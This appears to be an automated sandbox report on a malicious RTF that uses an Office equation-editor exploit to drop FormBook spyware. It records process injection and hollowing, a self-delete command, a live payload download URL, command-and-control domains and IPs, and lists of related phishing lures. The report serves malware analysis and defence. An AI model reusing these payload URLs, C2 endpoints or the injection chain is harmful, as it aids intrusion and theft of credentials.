          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_10001444 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10001444

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.photograph-gallery.com
          Source: C:\Windows\explorer.exeDomain query: www.devarajantraders.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.42.252 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.18.115 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.samytango.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\propser16364.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: DE0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeProcess created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection512Masquerading1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 403424 Sample: c8080fbf_by_Libranalysis Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 11 other signatures 2->55 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 336 20 2->15         started        17 EQNEDT32.EXE 2->17         started        process3 dnsIp4 41 carbinz.gq 185.239.243.112, 49167, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 10->41 37 C:\Users\user\AppData\...\propser16364.exe, PE32 10->37 dropped 39 C:\Users\user\AppData\...\prosperx[1].exe, PE32 10->39 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 19 propser16364.exe 19 10->19         started        file5 signatures6 process7 file8 35 C:\Users\user\AppData\...\ghvea31n0uw.dll, PE32 19->35 dropped 57 Multi AV Scanner detection for dropped file 19->57 59 Detected unpacking (changes PE section rights) 19->59 61 Machine Learning detection for dropped file 19->61 63 2 other signatures 19->63 23 propser16364.exe 19->23         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 23->65 67 Maps a DLL or memory area into another process 23->67 69 Sample uses process hollowing technique 23->69 71 Queues an APC in another process (thread injection) 23->71 26 explorer.exe 23->26 injected process12 dnsIp13 43 www.devarajantraders.com 154.86.42.252, 49168, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 26->43 45 www.samytango.com 26->45 47 2 other IPs or domains 26->47 73 System process connects to network (likely due to code injection or exploit) 26->73 30 NAPSTAT.EXE 26->30         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 30->77 79 Maps a DLL or memory area into another process 30->79 81 Tries to detect virtualization through RDTSC time measurements 30->81 33 cmd.exe 30->33         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          c8080fbf_by_Libranalysis.rtf50%VirustotalBrowse
          c8080fbf_by_Libranalysis.rtf51%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\propser16364.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe12%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe66%ReversingLabsWin32.Spyware.Noon
          C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll21%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Roaming\propser16364.exe12%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\propser16364.exe66%ReversingLabsWin32.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.1.propser16364.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.propser16364.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.0.propser16364.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          5.2.propser16364.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.propser16364.exe.450000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.propser16364.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          www.devarajantraders.com0%VirustotalBrowse
          carbinz.gq11%VirustotalBrowse
          ghs.googlehosted.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.devarajantraders.com/xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP00%Avira URL Cloudsafe
          www.shoprodeovegas.com/xcl/0%Avira URL Cloudsafe
          http://www.photograph-gallery.com/xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP00%Avira URL Cloudsafe
          http://carbinz.gq/modex/prosperx.exe100%Avira URL Cloudmalware
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.devarajantraders.com
          		154.86.42.252
          		truetrueunknown
          carbinz.gq
          		185.239.243.112
          		truetrueunknown
          ghs.googlehosted.com
          		172.217.18.115
          		truefalseunknown
          www.photograph-gallery.com
          		unknown
          		unknowntrue
            		unknown
            www.samytango.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.devarajantraders.com/xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0true
              • Avira URL Cloud: safe
              		unknown
              www.shoprodeovegas.com/xcl/true
              • Avira URL Cloud: safe
              		low
              http://www.photograph-gallery.com/xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0false
              • Avira URL Cloud: safe
              		unknown
              http://carbinz.gq/modex/prosperx.exetrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpfalse
                		high
                http://investor.msn.comexplorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmpfalse
                      		high
                      http://www.msn.com/?ocid=iehpxeexplorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpfalse
                        		high
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1/explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmpfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorpropser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmpfalse
                            		high
                            http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpfalse
                              		high
                              http://treyresearch.netexplorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmpfalse
                                		high
                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmpfalse
                                    		high
                                    http://nsis.sf.net/NSIS_Errorpropser16364.exe, propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmpfalse
                                        		high
                                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=17explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmpfalse
                                          		high
                                          http://investor.msn.com/explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.%s.comexplorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low
                                            http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.msn.com/?ocid=iehpeM9explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.msn.com/de-de/?ocid=iehp2explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.%s.comPApropser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		low
                                                    http://%s.comexplorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		low
                                                    http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.2098818599.0000000004F30000.00000002.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    185.239.243.112
                                                    		carbinz.gqMoldova Republic of
                                                    		55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                                    154.86.42.252
                                                    		www.devarajantraders.comSeychelles
                                                    		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                    172.217.18.115
                                                    		ghs.googlehosted.comUnited States
                                                    		15169GOOGLEUSfalse

                                                    General Information

                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                    Analysis ID:403424
                                                    Start date:04.05.2021
                                                    Start time:05:36:10
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 5s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:c8080fbf_by_Libranalysis (renamed file extension from none to rtf)
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winRTF@10/12@4/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 14.1% (good quality ratio 13.4%)
                                                    • Quality average: 74.9%
                                                    • Quality standard deviation: 27.2%
                                                    HCA Information:
                                                    • Successful, ratio: 87%
                                                    • Number of executed functions: 100
                                                    • Number of non-executed functions: 73
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Active ActiveX Object
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    05:36:36API Interceptor205x Sleep call for process: EQNEDT32.EXE modified
                                                    05:36:41API Interceptor35x Sleep call for process: propser16364.exe modified
                                                    05:36:57API Interceptor157x Sleep call for process: NAPSTAT.EXE modified
                                                    05:37:38API Interceptor1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    185.239.243.112e3921ea8_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • vespang.ga/favico/nedx.exe
                                                    FROCH ENTERPRISE PROFILE.docGet hashmaliciousBrowse
                                                    • vespang.ga/resp/fad/SZOUQ7KsUzcDsCB.exe
                                                    c1c943e6_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • vespang.ga/favico/mosb.exe
                                                    Inquiry 05042021.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/prosperx.exe
                                                    machine spares .docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/kdotx.exe
                                                    SWIFT COPY.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/shedyx.exe
                                                    HCU213DES.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/dchampx.exe
                                                    calvary petroleum.docGet hashmaliciousBrowse
                                                    • vespang.ga/rainers/djj/3DfqE7CuHdKNm2P.exe
                                                    Sidertaglio PO_20210305.docGet hashmaliciousBrowse
                                                    • vespang.ga/rainers/og/yMfDYTbuXFGA7nz.exe
                                                    PO 9661641.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/kdotx.exe
                                                    DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/izux.exe
                                                    payment invoice.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/ellawealthx.exe
                                                    9327ac21_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • vespang.ga/favico/mena.exe
                                                    Request for New Quote - Valve Ist Order.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/kayx.exe
                                                    INV 57474545.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/tgixx.exe
                                                    Order List No1638829.xlsxGet hashmaliciousBrowse
                                                    • vespang.gq/favico/mena.exe
                                                    GTRFQ-21-2332-1079-STRUCTURAL STEEL.docGet hashmaliciousBrowse
                                                    • vespang.gq/obrigado/jas/hATsvlnsX4Ox4qP.exe
                                                    RFQ for MR 29483 for Affordable Villa.docGet hashmaliciousBrowse
                                                    • vespang.gq/obrigado/ik/PUKfyFHG2AWXj1W.exe
                                                    Request for Quotation_28042021.docGet hashmaliciousBrowse
                                                    • carbinz.gq/modex/africax.exe
                                                    RFQ-NEW ORDER BERUIT 67271929.xlsxGet hashmaliciousBrowse
                                                    • vespang.gq/favico/mnesotta.exe

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    carbinz.gqInquiry 05042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    machine spares .docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    SWIFT COPY.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    HCU213DES.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PO 9661641.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    payment invoice.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Request for New Quote - Valve Ist Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    INV 57474545.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Request for Quotation_28042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Signed Contract.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    DVO100024000.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    QUOTE.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    978463537_BL FOR APPROVAL.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Specification.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Request for Quotation.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PURCHASE ORDER 26042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    RFQ_0592107.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    payment advice.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Quotation Sheet - RFQ26042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKREQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                    • 154.220.41.208
                                                    O1E623TjjW.exeGet hashmaliciousBrowse
                                                    • 43.230.169.157
                                                    SWIT BANK PAPER PAYMENT.exeGet hashmaliciousBrowse
                                                    • 154.213.207.4
                                                    PO_29_00412.exeGet hashmaliciousBrowse
                                                    • 154.216.244.232
                                                    z5Wqivscwd.exeGet hashmaliciousBrowse
                                                    • 154.88.201.82
                                                    8480fe6d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                    • 154.88.208.8
                                                    S4gONKzrzB.exeGet hashmaliciousBrowse
                                                    • 154.216.85.54
                                                    PO17439.exeGet hashmaliciousBrowse
                                                    • 103.234.52.224
                                                    gunzipped.exeGet hashmaliciousBrowse
                                                    • 103.234.52.32
                                                    FORM C.xlsxGet hashmaliciousBrowse
                                                    • 160.124.11.194
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 156.252.92.240
                                                    2sj75tLtYO.exeGet hashmaliciousBrowse
                                                    • 154.88.205.42
                                                    z3hir.x86Get hashmaliciousBrowse
                                                    • 156.242.113.180
                                                    Invoice.exeGet hashmaliciousBrowse
                                                    • 103.234.52.211
                                                    dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                    • 160.124.11.194
